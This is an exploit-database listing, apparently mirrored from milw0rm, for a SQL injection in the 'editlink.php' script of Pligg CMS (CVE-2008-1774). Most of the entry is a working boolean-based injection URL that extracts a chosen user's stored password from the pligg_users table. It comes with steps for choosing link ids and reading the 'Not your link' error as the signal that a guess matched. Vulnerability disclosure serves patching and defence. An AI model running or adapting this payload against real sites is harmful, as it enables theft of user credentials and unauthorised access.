[] NeoSense
E X P L O I T S
title author type platform port cve id

Pligg CMS 9.9.0 - 'editlink.php' SQL Injection

Author: Guido Landi
type: webapps
platform: php
port: 
date_added: 2008-04-07 
date_updated: 2016-11-21 
verified: 1 
codes: OSVDB-44383;CVE-2008-1774 
tags: 
aliases:  
screenshot_url:  
application_url: 
Hello,

the Pligg (http://www.pligg.com/) content management system is prone to
an SQL-injection vulnerability because it fails to sufficiently sanitize
user-supplied data before using it in an SQL query:


editlink.php?id=1+AND+((SELECT+user_pass+FROM+pligg_users+WHERE+user_login=0x676f64)+LIKE+0x25)+UNION+SELECT+10,2

To exploit this you need the id of a news you submitted(10 in the
example) and an id of a news submitted by others(1 in the example).

When the LIKE statement matches you get a "Not your link" error.


Guido Landi

# milw0rm.com [2008-04-08]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.